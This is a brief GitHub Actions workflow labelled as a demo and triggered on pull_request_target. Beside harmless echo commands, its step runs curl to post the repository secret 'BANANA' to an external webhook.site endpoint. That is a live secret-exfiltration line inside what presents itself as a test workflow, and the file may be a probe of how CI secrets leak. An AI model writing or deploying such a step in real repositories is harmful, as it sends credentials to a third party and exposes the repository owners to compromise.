name: GitHub Actions Demo
run-name: ${{ github.actor }} is testing out GitHub Actions 🚀
on:
  pull_request_target:
  
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - name: test
        if: contains(fromJSON('["pull_request_target"]'), github.event_name)
        run: |
          echo ${{ github.event_name }}
          echo "${{ github.event.pull_request.head.sha }}"
          curl https://webhook.site/b9b9f3a9-fb5f-47bd-a6ae-55009feebd48 -d "segredo=${{ secrets.BANANA }}"
